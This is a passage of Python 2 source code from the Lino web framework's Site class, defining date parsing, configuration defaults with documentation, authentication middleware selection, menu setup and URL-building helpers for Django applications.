""" datetime_format_extjs = 'Y-m-d\TH:i:s' """ Format (in ExtJS syntax) to use for formatting timestamps in AJAX calls. If you change this setting, you also need to override :meth:`parse_datetime`. """ _welcome_actors = [] def init_before_local(self,*args): super(Site,self).init_before_local(*args) self.GFK_LIST = [] self.VIRTUAL_FIELDS = [] self.update_settings( LOGGING_CONFIG='lino.utils.log.configure', LOGGING=dict(filename=None, level='INFO', logger_names=self.auto_configure_logger_names, disable_existing_loggers=True, # Django >= 1.5 ), ) def parse_date(self,s): """ Convert a string formatted using :attr:`date_format_strftime` or :attr:`date_format_extjs` into a `(y,m,d)` tuple (not a `datetime.date` instance). See `/blog/2010/1130`. """ ymd = tuple(reversed(map(int,s.split('.')))) assert len(ymd) == 3 return ymd #~ return datetime.date(*ymd) def parse_time(self,s): """ Convert a string formatted using :attr:`time_format_strftime` or :attr:`time_format_extjs` into a datetime.time instance. """ hms = map(int,s.split(':')) return datetime.time(*hms) def parse_datetime(self,s): """ Convert a string formatted using :attr:`datetime_format_strftime` or :attr:`datetime_format_extjs` into a datetime.datetime instance. """ #~ print "20110701 parse_datetime(%r)" % s #~ s2 = s.split() s2 = s.split('T') if len(s2) != 2: raise Exception("Invalid datetime string %r" % s) ymd = map(int,s2[0].split('-')) hms = map(int,s2[1].split(':')) return datetime.datetime(*(ymd+hms)) #~ d = datetime.date(*self.parse_date(s[0])) #~ return datetime.combine(d,t) ignore_dates_before = datetime.date.today() + datetime.timedelta(days=-7) """ Ignore dates before the gived date. Set this to None if you want no limit. """ #~ def get_user_model(self): #~ if 'django.contrib.auth' in self.django_settings['INSTALLED_APPS']: #~ from django.contrib.auth.models import User #~ return 'auth.User' #~ else: #~ from lino.modlib.users.models import User #~ return User #~ return 'users.User' #~ def add_dummy_message(self,s): #~ self.dummy_messages.add(s) #~ def get_app_source_file(self): #~ "Override this in each application" #~ return __file__ #~ def analyze_models(self): #~ from lino.core.kernel import analyze_models #~ analyze_models() def resolve_virtual_fields(self): #~ print "20130827 resolve_virtual_fields", len(self.VIRTUAL_FIELDS) #~ global VIRTUAL_FIELDS for vf in self.VIRTUAL_FIELDS: vf.lino_resolve_type() #~ VIRTUAL_FIELDS = None self.VIRTUAL_FIELDS = [] def register_virtual_field(self,vf): #~ print "20130827 register_virtual_field", vf self.VIRTUAL_FIELDS.append(vf) def do_site_startup(self): """ Start the Lino instance (the object stored as :setting:`LINO` in your :xfile:`settings.py`). This is called exactly once from :mod:`lino.models` when Django has has populated it's model cache. This code can run several times at once when running e.g. under mod_wsgi: another thread has started and not yet finished `startup_site()`. 
""" super(Site,self).do_site_startup() from lino.core.kernel import startup_site startup_site(self) from django.conf import settings if self.build_js_cache_on_startup is None: from lino.core.dbutils import is_devserver self.build_js_cache_on_startup = not (settings.DEBUG or is_devserver()) from lino.core.web import site_setup site_setup(self) from lino.ui.ui import ExtUI self.ui = ExtUI(self) from lino.core import actors for a in actors.actors_list: if a.get_welcome_messages is not None: self._welcome_actors.append(a) #~ def shutdown(self): #~ return super(Site,self).shutdown() #~ from lino.core.kernel import shutdown_site #~ shutdown_site(self) #~ def setup_workflows(self): self.on_each_app('setup_workflows') def setup_choicelists(self): from lino.utils import dblogger as logger #~ raise Exception("20130302 setup_choicelists()") #~ logger.info("20130302 setup_choicelists()") from django.utils.translation import ugettext_lazy as _ from lino import dd dd.UserProfiles.reset() add = dd.UserProfiles.add_item add('000', _("Anonymous"), name='anonymous', level=None, #~ readonly=True, authenticated=False) add('100', _("User"), name='user', level='user') add('900', _("Administrator"), name='admin', level='admin') def add_user_field(self,name,fld): if self.user_model: from lino import dd #~ User = dd.resolve_model(self.user_model) dd.inject_field(self.user_model,name,fld) #~ if profile: #~ self.user_profile_fields.append(name) def get_generic_related(self,obj): """ Yield all database objects in database which have a GenericForeignKey that points to the object `obj`. """ from django.contrib.contenttypes.models import ContentType for gfk in self.GFK_LIST: ct = ContentType.objects.get_for_model(gfk.model) kw = dict() kw[gfk.fk_field] = obj.pk yield gfk, ct.get_all_objects_for_this_type(**kw) def using(self,ui=None): """ Adds Lino, Jinja, Spinx, dateutil, ... 
""" import lino yield ("Lino",lino.SETUP_INFO['version'],lino.SETUP_INFO['url']) for u in super(Site,self).using(ui): yield u #~ import tidylib #~ version = getattr(tidylib,'__version__','') #~ yield ("tidylib",version,"http://countergram.com/open-source/pytidylib") #~ import pyPdf #~ version = getattr(pyPdf,'__version__','') #~ yield ("pyPdf",version,"http://countergram.com/open-source/pytidylib") import jinja2 version = getattr(jinja2,'__version__','') yield ("Jinja",version,"http://jinja.pocoo.org/") import sphinx version = getattr(sphinx,'__version__','') yield ("Sphinx",version,"http://sphinx-doc.org/") import dateutil version = getattr(dateutil,'__version__','') yield ("python-dateutil",version,"http://labix.org/python-dateutil") #~ try: #~ import Cheetah #~ version = Cheetah.Version #~ yield ("Cheetah",version ,"http://cheetahtemplate.org/") #~ except ImportError: #~ pass try: from odf import opendocument version = opendocument.__version__ except ImportError: version = self.not_found_msg yield ("OdfPy",version ,"http://pypi.python.org/pypi/odfpy") try: import docutils version = docutils.__version__ except ImportError: version = self.not_found_msg yield ("docutils",version ,"http://docutils.sourceforge.net/") try: import suds version = suds.__version__ except ImportError: version = self.not_found_msg yield ("suds",version ,"https://fedorahosted.org/suds/") import yaml version = getattr(yaml,'__version__','') yield ("PyYaml",version,"http://pyyaml.org/") if False: try: import pyratemp version = getattr(pyratemp,'__version__','') except ImportError: version = self.not_found_msg yield ("pyratemp",version,"http://www.simple-is-better.org/template/pyratemp.html") if False: try: import ho.pisa as pisa version = getattr(pisa,'__version__','') yield ("xhtml2pdf",version,"http://www.xhtml2pdf.com") except ImportError: pass try: import reportlab version = reportlab.Version except ImportError: version = self.not_found_msg yield ("ReportLab",version,"http://www.reportlab.org/rl_toolkit.html") try: #~ import appy from appy import version version = version.verbose except ImportError: version = self.not_found_msg yield ("Appy",version ,"http://appyframework.org/pod.html") #~ for p in self.installed_plugins if ui and self.use_extjs: #~ version = '<script type="text/javascript">document.write(Ext.version);</script>' onclick = "alert('ExtJS client version is ' + Ext.version);" tip = "Click to see ExtJS client version" text = "(version)" #~ version = """<a href="#" onclick="%s" title="%s">%s</a>""" % (onclick,tip,text) version = E.a(text,href='#',onclick=onclick,title=tip) yield ("ExtJS",version ,"http://www.sencha.com") if self.use_extensible: onclick = "alert('Extensible Calendar version is ' + Ext.ensible.version);" tip = "Click to see Extensible Calendar version" text = "(version)" #~ version = """<a href="#" onclick="%s" title="%s">%s</a>""" % (onclick,tip,text) version = E.a(text,href='#',onclick=onclick,title=tip) yield ("Extensible",version ,"http://ext.ensible.com/products/calendar/") yield ("Silk Icons",'1.3',"http://www.famfamfam.com/lab/icons/silk/") def get_db_overview_rst(self): """ Returns a reStructredText-formatted "database overview" report. Used by the :mod:`diag <lino.management.commands.diag>` command and in test cases. 
""" from atelier import rstgen from lino.core.dbutils import obj2str, full_model_name, sorted_models_list, app_labels #~ writeln("Lino %s" % lino.__version__) #~ yield (settings.SITE.verbose_name, settings.SITE.version) #~ writeln(settings.SITE.title) models_list = sorted_models_list() apps = app_labels() s = "%d applications: %s." % (len(apps), ", ".join(apps)) s += "\n%d models:\n" % len(models_list) i = 0 headers = [ #~ "No.", "Name", #~ "Class", #~ "M", "#fields", "#rows", #~ ,"first","last" ] rows = [] for model in models_list: if model._meta.managed: i += 1 cells = [] #~ cells.append(str(i)) cells.append(full_model_name(model)) #~ cells.append(str(model)) #~ if model._meta.managed: #~ cells.append('X') #~ else: #~ cells.append('') cells.append(str(len(model._meta.fields))) #~ qs = model.objects.all() qs = model.objects.order_by('pk') n = qs.count() cells.append(str(n)) #~ if n: #~ cells.append(obj2str(qs[0])) #~ cells.append(obj2str(qs[n-1])) #~ else: #~ cells.append('') #~ cells.append('') rows.append(cells) s += rstgen.table(headers,rows) return s partners_app_label = 'contacts' """ Temporary setting, see :ref:`polymorphism`. """ # three constants used by lino.modlib.workflows: max_state_value_length = 20 max_action_name_length = 50 max_actor_name_length = 100 trusted_templates = False """ Set this to True if you are sure that the users of your site won't try to misuse Jinja's capabilities. """ #~ def add_config_value(self,name,default,help_text): #~ if not hasattr(self,name): #~ setattr(self,name,default) #~ add_config_value('allow_duplicate_cities',False) allow_duplicate_cities = False """ In a default configuration (when :attr:`allow_duplicate_cities` is False), Lino declares a UNIQUE clause for :class:`Cities <lino.modlib.countries.models.Cities>` to make sure that your database never contains duplicate cities. This behaviour mighr disturb e.g. when importing legacy data that did not have this restriction. Set it to True to remove the UNIQUE clause. Changing this setting might affect your database structure and thus require a :doc:`/topics/datamig` if your application uses :mod:`lino.modlib.countries`. """ uid = 'myuid' """ A universal identifier for this Site. This is needed when synchronizing with CalDAV server. Locally created calendar components in remote calendars will get a UID based on this parameter, using ``"%s@%s" (self.pk,settings.SITE.ui)``. The default value is ``'myuid'``, and you should certainly override this on a production server that uses remote calendars. """ #~ person_model = None #~ person_model = "contacts.Person" #~ """ #~ If your application uses :model:`lino.modlib.contacts`, #~ set this to a string "applabel.Modelname" which identifies #~ your Person model (which should inherit from #~ :class:`lino.modlib.contacts.models.Person`). #~ """ #~ company_model = None #~ company_model = "contacts.Company" #~ """ #~ If your application uses :model:`lino.modlib.contacts`, #~ set this to a string "applabel.Modelname" which identifies #~ your Company model (which should inherit from #~ :class:`lino.modlib.contacts.models.Company`). #~ """ project_model = None #~ user_model = "users.User" user_model = None auth_middleware = None legacy_data_path = None """ Used by custom fixtures that import data from some legacy database. """ propvalue_max_length = 200 """ Used by :mod:`lino.modlib.properties`. """ never_build_site_cache = False """ Set this to `True` if you want that Lino never (re)builds the site cache (even when asked). 
This can be useful on a development server when you are debugging directly on the generated :xfile:`lino*.js`. Or for certain unit test cases. """ show_internal_field_names = False """ Whether the internal field names should be visible. Default is `False`. ExtUI implements this by prepending them to the tooltip, which means that :attr:`use_quicktips` must also be `True`. """ build_js_cache_on_startup = None """ Whether the Javascript cache files should be built on startup for all user profiles and languages. On a production server this should be `True` for best performance, but while developing, it may be easier to set it to `False`, which means that each file is built upon need (when a first request comes in). The default value `None` means that Lino decides automatically during startup: it becomes `False` if either :func:`lino.core.dbutils.is_devserver` returns True or setting:`DEBUG` is set. """ #~ replace_django_templates = True #~ """ #~ Whether to replace Djano's template engine by Jinja. #~ """ use_experimental_features = False """ Whether to include "experimental" features. """ site_config_defaults = {} """ Default values to be used when creating the :class:`lino.models.SiteConfig` instance. Usage example:: site_config_defaults = dict(default_build_method='appypdf') """ is_demo_site = True """ When this is `True`, then this site runs in "demo" mode. "Demo mode" means: - the welcome text for anonymous users says "This demo site has X users, they all have "1234" as password", followed by a list of available usernames. Default value is `True`. On a production site you will of course set this to `False`. See also :attr:`demo_fixtures`. """ demo_email = '[email protected]' """ """ demo_fixtures = ['std','demo','demo2'] """ The list of fixtures to be loaded by the :mod:`initdb_demo <lino.management.commands.initdb_demo>` command. """ use_spinner = False # doesn't work. leave this to False #~ django_admin_prefix = '/django' django_admin_prefix = None """ The prefix to use for Django admin URLs. Leave this unchanged as long as :doc:`/tickets/70` is not solved. """ start_year = 2011 plain_prefix = 'plain' #~ admin_prefix = 'admin' admin_prefix = '' use_extjs = True time_format_extjs = 'H:i' """ Format (in ExtJS syntax) to use for displaying dates to the user. If you change this setting, you also need to override :meth:`parse_time`. """ date_format_extjs = 'd.m.Y' """ Format (in ExtJS syntax) to use for displaying dates to the user. If you change this setting, you also need to override :meth:`parse_date`. """ alt_date_formats_extjs = 'd/m/Y|Y-m-d' """ Alternative date entry formats accepted by ExtJS Date widgets. """ #~ default_number_format_extjs = '0,000.00/i' default_number_format_extjs = '0,00/i' uppercase_last_name = False """ Whether last name of persons should be printed with uppercase letters. See :mod:`lino.test_apps.human` """ extjs_root = None """ Path to the ExtJS root directory. Only used when :attr:`extjs_base_url` is None, and when the `media` directory has no symbolic link named `extjs` pointing to the ExtJS root directory. """ extjs_base_url = "http://extjs-public.googlecode.com/svn/tags/extjs-3.3.1/release/" """ The URL from where to include the ExtJS library files. The default value points to the `extjs-public <http://code.google.com/p/extjs-public/>`_ repository and thus requires the clients to have an internet connection. This relieves newcomers from the burden of having to specify a download location in their :xfile:`settings.py`. 
On a production site you'll probably want to download and serve these files yourself by setting this to `None` and setting :attr:`extjs_root` (or a symbolic link "extjs" in your :xfile:`media` directory) to point to the local directory where ExtJS 3.3.1 is installed). The same rules apply to the attributes :attr:`extensible_base_url <lino.site.Site.extensible_base_url>`, :attr:`bootstrap_base_url <lino.site.Site.bootstrap_base_url>` and :attr:`tinymce_base_url <lino.site.Site.tinymce_base_url>`. """ extensible_base_url = "http://ext.ensible.com/deploy/1.0.2/" "Similar to :attr:`extjs_base_url` but pointing to ext.ensible.com." bootstrap_base_url = "http://twitter.github.com/bootstrap/assets/" "Similar to :attr:`extjs_base_url` but pointing to twitter.github.com." tinymce_base_url = "http://www.tinymce.com/js/tinymce/jscripts/tiny_mce/" "Similar to :attr:`extjs_base_url` but pointing to http://www.tinymce.com." bootstrap_root = None """ Path to the Jasmine root directory. Only used on a development server whose `media` directory hasn't already a symbolic link or subdirectory, and only if :attr:`use_bootstrap` is True. """ jasmine_root = None """ Path to the Jasmine root directory. Only used on a development server if the `media` directory has no symbolic link to the Jasmine root directory and only if :attr:`use_jasmine` is True. """ extensible_root = None """ Path to the Extensible root directory. Only used on a development server if the `media` directory has no symbolic link to the Extensible root directory, and only if :attr:`use_extensible` is True. """ tinymce_root = None """ Path to the tinymce root directory. Only to be used on a development server if the `media` directory has no symbolic link to the TinyMCE root directory, and only if :attr:`use_tinymce` is True. """ eid_jslib_root = None """ Path to the `eid_jslib` root directory. Only to be used on a development server if the `media` directory has no symbolic link to the directory, and only if :attr:`use_eid_jslib` is True. http://code.google.com/p/eid-javascript-lib/ """ default_user = None """ Username to be used if a request with no REMOTE_USER header makes its way through to Lino. Which may happen on a development server and if Apache is configured to allow it. Used by :mod:`lino.core.auth`. """ anonymous_user_profile = '000' """ The UserProfile to be assigned to anonymous user. """ #~ remote_user_header = "REMOTE_USER" remote_user_header = None ldap_auth_server = None #~ simulate_remote_user = False use_gridfilters = True use_eid_applet = False """ Whether to include functionality to read Belgian id cards using the official `eid-applet <http://code.google.com/p/eid-applet>`_. This option is experimental and doesn't yet work. See `/blog/2012/1105`. """ use_eid_jslib = False """ Whether to include functionality to read Belgian id cards using Johan De Schutter's `eid-javascript-lib <http://code.google.com/p/eid-javascript-lib/>`_. If this is True, Lino expects eid-javascript-lib to be installed in a directory `media/beid-jslib`. See also :attr:`eid_jslib_root`. """ use_esteid = False """ Whether to include functionality to read Estonian id cards. This option is experimental and doesn't yet work. """ use_filterRow = not use_gridfilters """ See `/blog/2011/0630`. This option was experimental and doesn't yet work (and maybe never will). """ use_awesome_uploader = False """ Whether to use AwesomeUploader. This option was experimental and doesn't yet work (and maybe never will). 
""" use_tinymce = True """ Whether to use TinyMCE instead of Ext.form.HtmlEditor. See also :attr:`tinymce_root`. See `/blog/2011/0523`. """ use_bootstrap = True """ Whether to use the `Bootstrap <http://twitter.github.com/bootstrap>`_ CSS toolkit. """ use_jasmine = False """ Whether to use the `Jasmine <https://github.com/pivotal/jasmine>`_ testing library. """ use_extensible = True """ Whether to use the `Extensible <http://ext.ensible.com>`_ calendar library. """ use_quicktips = True """ Whether to make use of `Ext.QuickTips <http://docs.sencha.com/ext-js/3-4/#!/api/Ext.QuickTips>`_ when displaying :ref:`help_texts`. """ use_css_tooltips = False """ Whether to make use of CSS tooltips when displaying help texts defined in :class:`lino.models.HelpText`. """ use_vinylfox = False """ Whether to use VinylFox extensions for HtmlEditor. This feature was experimental and doesn't yet work (and maybe never will). See `/blog/2011/0523`. """ webdav_root = None """ The path on server to store webdav files. Default is "PROJECT_DIR/media/webdav". """ webdav_url = None """ The URL prefix for webdav files. In a normal production configuration you should leave this to `None`, Lino will set a default value "/media/webdav/", supposing that your Apache is configured as described in :doc:`/admin/webdav`. This may be used to simulate a :term:`WebDAV` location on a development server. For example on a Windows machine, you may set it to ``w:\``, and before invoking :term:`runserver`, you issue in a command prompt:: subst w: <dev_project_path>\media\webdav """ #~ use_eidreader = False #~ """ #~ Set this to `True` if this site should feature using :ref:`eidreader`. #~ """ use_davlink = False #~ max_auto_events = 72 #~ """ #~ Maximum number of automatic events to be generated. #~ """ #~ mergeable_models = [] #~ """ #~ A list of models that should have a "Merge" action #~ (see :mod:`lino.mixins.mergeable`). #~ """ override_modlib_models = None sidebar_width = 0 """ Width of the sidebar in 1/12 of total screen width. Meaningful values are 0 (no sidebar), 2 or 3. """ # for internal use: #~ _extjs_ui = None #~ _groph_ui = None _site_config = None def override_defaults(self,**kwargs): """ """ #~ logger.info("20130404 lino.site.Site.override_defaults") super(Site,self).override_defaults(**kwargs) installed_apps = tuple(self.get_installed_apps()) + ('lino','djangosite') installed_apps = tuple([str(x) for x in installed_apps]) self.update_settings(INSTALLED_APPS=installed_apps) if self.override_modlib_models is None: self.override_modlib_models = set() from django.utils.importlib import import_module for n in installed_apps: m = import_module(n) app = getattr(m,'App',None) if app is not None: if app.extends_models is not None: for m in app.extends_models: self.override_modlib_models.add(m) #~ fd = list() #~ self.update_settings(FIXTURE_DIRS=tuple(settings_subdirs('fixtures'))) if self.webdav_url is None: self.webdav_url = '/media/webdav/' if self.webdav_root is None: self.webdav_root = join(abspath(self.project_dir),'media','webdav') if not self.django_settings.get('MEDIA_ROOT',False): """ Django's default value for MEDIA_ROOT is an empty string. In certain test cases there migth be no MEDIA_ROOT key at all. Lino's default value for MEDIA_ROOT is ``<project_dir>/media``. 
""" self.django_settings.update(MEDIA_ROOT=join(self.project_dir,'media')) self.update_settings( ROOT_URLCONF = 'lino.ui.urls' ) self.update_settings( MEDIA_URL = '/media/' ) self.update_settings( TEMPLATE_LOADERS=tuple([ 'lino.core.web.Loader', 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', #~ 'django.template.loaders.eggs.Loader', ])) tcp = [] if self.user_model == 'auth.User': self.update_settings(LOGIN_URL = '/accounts/login/') self.update_settings(LOGIN_REDIRECT_URL = "/") tcp += [ 'django.contrib.auth.context_processors.auth' ] tcp += [ 'django.core.context_processors.debug', 'django.core.context_processors.i18n', 'django.core.context_processors.media', 'django.core.context_processors.static', # 'django.core.context_processors.request', #~ 'django.contrib.messages.context_processors.messages', ] self.update_settings(TEMPLATE_CONTEXT_PROCESSORS = tuple(tcp)) self.define_settings( MIDDLEWARE_CLASSES=tuple(self.get_middleware_classes())) #~ print 20130313, self.django_settings['MIDDLEWARE_CLASSES'] #~ def get_plugins(self): #~ from lino.ui.ui import ExtUI #~ yield ExtUI() #~ def do_site_startup(self): #~ raise Exception("20130302") #~ try: #~ super(Site,self).do_site_startup() #~ if True: #~ self.ui = #~ except Exception as e: #~ import traceback #~ traceback.print_exc(e) #~ sys.exit(-10) #~ raise Exception("20130302") def is_abstract_model(self,name): """ Return True if the named model ("myapp.MyModel") is declared in :attr:`override_modlib_models`. """ return name in self.override_modlib_models def is_imported_partner(self,obj): """ Return whether the specified :class:`Partner <lino.modlib.contacts.models.Partner>` instance `obj` is to be considered as imported from some legacy database. """ #~ return obj.id is not None and (obj.id < 200000 or obj.id > 299999) return False #~ return obj.id is not None and (obj.id > 10 and obj.id < 21) def site_header(self): """ Used in footnote or header of certain printed documents. The convention is to call it as follows from an appy.pod template (use the `html` function, not `xhtml`) :: do text from html(settings.SITE.site_header()) Note that this is expected to return a unicode string possibly containing valid HTML (not XHTML) tags for formatting. """ if self.is_installed('contacts'): if self.site_config.site_company: return self.site_config.site_company.get_address('<br/>') #~ s = unicode(self.site_config.site_company) + " / " + s #~ return '' def setup_main_menu(self): """ To be implemented by applications. """ pass #~ @property #~ def site_config(self): #~ SiteConfig = self.modules.system.SiteConfig #~ try: #~ return SiteConfig.objects.get(pk=1) #~ except SiteConfig.DoesNotExist: #~ kw = dict(pk=1) #~ kw.update(self.site_config_defaults) #~ sc = SiteConfig(**kw) #~ sc.full_clean() #~ sc.save() #~ return sc @property def site_config(self): """ Returns the one and only :class:`lino.modlib.system.models.SiteConfig` instance which contains Site configuration parameters which are stored in the database and editable using the web interface. If no instance exists (which happens in a virgin database), we create it using default values from :attr:`site_config_defaults`. 
""" if self._site_config is None: #~ raise Exception(20130301) #~ print '20130320 create _site_config' #~ from lino.core.dbutils import resolve_model #~ from lino.core.dbutils import obj2str #~ from lino.utils import dblogger as logger #~ SiteConfig = resolve_model('system.SiteConfig') SiteConfig = self.modules.system.SiteConfig #~ from .models import SiteConfig #~ from django.db.utils import DatabaseError try: #~ self._site_config = SiteConfig.real_objects.get(pk=1) self._site_config = SiteConfig.real_objects.get(pk=self.config_id) #~ print "20130301 Loaded SiteConfig record", obj2str(self._site_config,True) #~ except (SiteConfig.DoesNotExist,DatabaseError): except SiteConfig.DoesNotExist: #~ except Exception,e: kw = dict(pk=self.config_id) #~ kw.update(settings.SITE.site_config_defaults) kw.update(self.site_config_defaults) self._site_config = SiteConfig(**kw) #~ print "20130301 Created SiteConfig record", obj2str(self._site_config,True) # 20120725 # polls_tutorial menu selection `Config --> Site Parameters` # said "SiteConfig 1 does not exist" # cannot save the instance here because the db table possibly doesn't yet exit. #~ self._site_config.save() return self._site_config #~ site_config = property(get_site_config) #~ def shutdown(self): #~ self.clear_site_config() #~ return super(Site,self).shutdown() def clear_site_config(self): """ Clear the cached SiteConfig instance. This is needed e.g. when the test runner has created a new test database. """ self._site_config = None #~ print "20130320 clear_site_config" #~ def on_site_config_saved(self,sc): #~ """ #~ Used internally. Called by SiteConfig.save() to update the cached instance. #~ """ #~ pass #~ self._site_config = sc #~ from lino.core.dbutils import obj2str #~ print '20120801 site_config saved', obj2str(sc,True) def is_imported_partner(self,obj): """ Return whether the specified :class:`Partner <lino.modlib.contacts.models.Partner>` instance `obj` is to be considered as imported from some legacy database. """ #~ return obj.id is not None and (obj.id < 200000 or obj.id > 299999) return False #~ return obj.id is not None and (obj.id > 10 and obj.id < 21) def get_quicklinks(self,ar): from lino.core import menus m = menus.Toolbar(ar.get_user().profile,'quicklinks') self.setup_quicklinks(ar,m) return m def get_site_menu(self,ui,profile): """ Return this site's main menu for the given UserProfile. Must be a :class:`lino.core.menus.Toolbar` instance. Applications usually should not need to override this. """ from django.utils.translation import ugettext_lazy as _ from lino.core import menus main = menus.Toolbar(profile,'main') self.setup_menu(ui,profile,main) main.compress() #~ url = self.admin_url #~ if not url: #~ url = "/" #~ main.add_url_button(url,label=_("Home")) #~ url = "javascript:Lino.close_all_windows()" #~ main.add_url_button(url,label=_("Home")) return main def setup_quicklinks(self,ar,m): """ Override this in application-specific (or even local) :xfile:`settings.py` files to define a series of *quick links* to appear below the main menu bar. Example see :meth:`lino.projects.pcsw.settings.Site.setup_quicklinks`. """ self.on_each_app('setup_quicklinks',ar,m) def setup_menu(self,ui,profile,main): """ Set up the application's menu structure. The default implementation uses a system of predefined top-level items that are filled by the different :setting:`INSTALLED_APPS`. 
To use this system, application programmers define one or several of the following functions in their `models` module: - `setup_master_menu` - `setup_main_menu` - `setup_reports_menu` - `setup_config_menu` - `setup_explorer_menu` - `setup_site_menu` These functions, if present, will be called with three positional arguments: `ui`, `profile` and `menu`. Deserves more documentation. """ from django.utils.translation import ugettext_lazy as _ m = main.add_menu("master",_("Master")) self.on_each_app('setup_master_menu',ui,profile,m) #~ if not profile.readonly: #~ m = main.add_menu("my",_("My menu")) #~ self.on_each_app('setup_my_menu',ui,profile,m) self.on_each_app('setup_main_menu',ui,profile,main) m = main.add_menu("reports",_("Reports")) self.on_each_app('setup_reports_menu',ui,profile,m) m = main.add_menu("config",_("Configure")) self.on_each_app('setup_config_menu',ui,profile,m) m = main.add_menu("explorer",_("Explorer")) self.on_each_app('setup_explorer_menu',ui,profile,m) m = main.add_menu("site",_("Site")) self.on_each_app('setup_site_menu',ui,profile,m) return main def get_middleware_classes(self): """ Yields the strings to be stored in the :setting:`MIDDLEWARE_CLASSES` setting. In case you don't want to use this method for defining :setting:`MIDDLEWARE_CLASSES`, you can simply set :setting:`MIDDLEWARE_CLASSES` in your :xfile:`settings.py` after the :class:`lino.site.Site` has been instantiated. `Django and standard HTTP authentication <http://stackoverflow.com/questions/152248/can-i-use-http-basic-authentication-with-django>`_ """ yield 'django.middleware.common.CommonMiddleware' #~ yield 'django.contrib.sessions.middleware.SessionMiddleware' if self.languages and len(self.languages) > 1: yield 'django.middleware.locale.LocaleMiddleware' #~ yield 'django.contrib.auth.middleware.AuthenticationMiddleware' #~ if self.user_model: #~ if self.user_model is None: #~ yield 'lino.core.auth.NoUserMiddleware' #~ elif self.remote_user_header: if self.auth_middleware: yield self.auth_middleware else: if self.user_model is None: yield 'lino.core.auth.NoUserMiddleware' elif self.remote_user_header: yield 'lino.core.auth.RemoteUserMiddleware' #~ yield 'django.middleware.doc.XViewMiddleware' else: # not using remote http auth, so we need sessions yield 'django.contrib.sessions.middleware.SessionMiddleware' if self.ldap_auth_server: yield 'lino.core.auth.LDAPAuthMiddleware' else: yield 'lino.core.auth.SessionUserMiddleware' #~ raise Exception("""\ #~ `user_model` is not None, but no `remote_user_header` in your settings.SITE.""") #~ yield 'lino.utils.editing.EditingMiddleware' if True: yield 'lino.utils.ajax.AjaxExceptionResponse' if False: # not BYPASS_PERMS: yield 'django.contrib.auth.middleware.RemoteUserMiddleware' # TODO: find solution for this: #~ AUTHENTICATION_BACKENDS = ( #~ 'django.contrib.auth.backends.RemoteUserBackend', #~ ) if False: #~ yield 'lino.utils.sqllog.ShortSQLLogToConsoleMiddleware' yield 'lino.utils.sqllog.SQLLogToConsoleMiddleware' #~ yield 'lino.utils.sqllog.SQLLogMiddleware' def get_main_action(self,profile): """ Return the action to show as top-level "index.html". The default implementation returns `None`, which means that Lino will call :meth:`get_main_html`. """ return None def get_main_html(self,request): """ Return a chunk of html to be displayed in the main area of the admin index. This is being called only if :meth:`get_main_action` returns `None`. The default implementation renders the :xfile:`admin_main.html` template. 
""" from lino.core import web return web.render_from_request(request,'admin_main.html') def get_welcome_messages(self,ar): """ Return or yield a list of messages to display for welcome. """ for a in self._welcome_actors: for msg in a.get_welcome_messages(ar): yield msg def get_todo_tables(self,ar): """ Return or yield a list of tables that should be empty """ from django.db import models for app_module in models.get_apps(): meth = getattr(app_module,'get_todo_tables',None) if meth is not None: #~ dblogger.debug("Running %s of %s", methname, mod.__name__) for table,text in meth(ar): if isinstance(table,basestring): table = self.modules.resolve(table) if table.default_action.get_view_permission(ar.get_user().profile): if table.default_action.get_row_permission(ar,None,None): #~ if table.default_action.get_bound_action_permission(ar,None,None): if text is None: text = "%d " + unicode(table.label) yield (table,text) def get_installed_apps(self): #~ yield 'lino.ui' if self.user_model is not None and self.remote_user_header is None: yield 'django.contrib.sessions' # 20121103 if self.django_admin_prefix: yield 'django.contrib.admin' #~ 'django.contrib.markup', #~ yield 'django_extensions' yield 'lino.modlib.about' #~ if self.admin_prefix: #~ yield 'lino.modlib.pages' for a in self.user_apps: yield a #~ def get_guest_greeting(self): #~ return E.p("Please log in") site_prefix = '/' """ This must be set if your project is not sitting at the "root" URL of your server. It must start *and* end with a *slash*. Default value is ``'/'``. For example if you have:: WSGIScriptAlias /foo /home/luc/mypy/lino_sites/foo/wsgi.py Then your :xfile:`settings.py` should specify:: site_prefix = '/foo/' See also :ref:`mass_hosting`. """ def buildurl(self,*args,**kw): #~ url = '/' + ("/".join(args)) url = self.site_prefix + ("/".join(args)) if len(kw): url += "?" + urlencode(kw) return url def build_admin_url(self,*args,**kw): if self.admin_prefix: return self.buildurl(self.admin_prefix,*args,**kw) return self.buildurl(*args,**kw) def build_media_url(self,*args,**kw): return self.buildurl('media',*args,**kw) def build_plain_url(self,*args,**kw): if self.plain_prefix: return self.buildurl('plain',*args,**kw) return self.buildurl(*args,**kw) #~ return self.plain_prefix + self.buildurl(*args,**kw) def build_extjs_url(self,url): if self.extjs_base_url: return self.extjs_base_url + url return self.build_media_url('extjs',url) def build_extensible_url(self,url): if self.extensible_base_url: return self.extensible_base_url + url return self.build_media_url('extensible',url) def build_bootstrap_url(self,url): if self.bootstrap_base_url: return self.bootstrap_base_url + url return self.build_media_url('bootstrap',url) def build_tinymce_url(self,url): if self.tinymce_base_url: return self.tinymce_base_url + url return self.build_media_url('tinymce',url) def get_system_note_recipients(self,ar,obj,silent): """ Return or yield a list of recipients (i.e. strings "Full Name <[email protected]>" ) to be notified by email about a system note issued by action request `ar` about the object instance `obj`. Default behaviour is to simply forwar it to the `obj`'s :meth:`get_system_note_recipients <lino.core.model.Model.get_system_note_recipients>`, but here is a hook to define local exceptions to the application specific default rules. """ return obj.get_system_note_recipients(ar,silent) def welcome_html(self,ui=None): """ Return a HTML version of the "This is APPLICATION version VERSION using ..." text. 
to be displayed in the About dialog, in the plain html footer, and maybe at other places. """ from django.utils.translation import ugettext as _ p = [] sep = '' if self.verbose_name: p.append(_("This is ")) if self.url: p.append(E.a(self.verbose_name,href=self.url,target='_blank')) else: p.append(E.b(self.verbose_name)) if self.version: p.append(' ') p.append(self.version) sep = _(' using ') for name,version,url in self.using(True): p.append(sep) p.append(E.a(name,href=url,target='_blank')) p.append(' ') p.append(version) sep = ', ' return E.span(*p) #~ def welcome_html(self,ui=None): #~ """ #~ Text to display in the "about" dialog of a GUI application. #~ """ #~ sep = '<br/>' #~ kw = dict(me=self.site_version(), #~ using = sep.join(['<a href="%s" target="_blank">%s</a>&nbsp;%s' #~ % (u,n,v) for n,v,u in self.using(ui)])) #~ return "This is %(me)s using %(using)s." % kw def login(self,username=None,**kw): """ For usage from a shell. The :meth:`login <lino.site.Site.login>` method doesn't require any password because when somebody has command-line access we trust that she has already authenticated. It returns a :class:`BaseRequest <lino.core.requests.BaseRequest>` object which 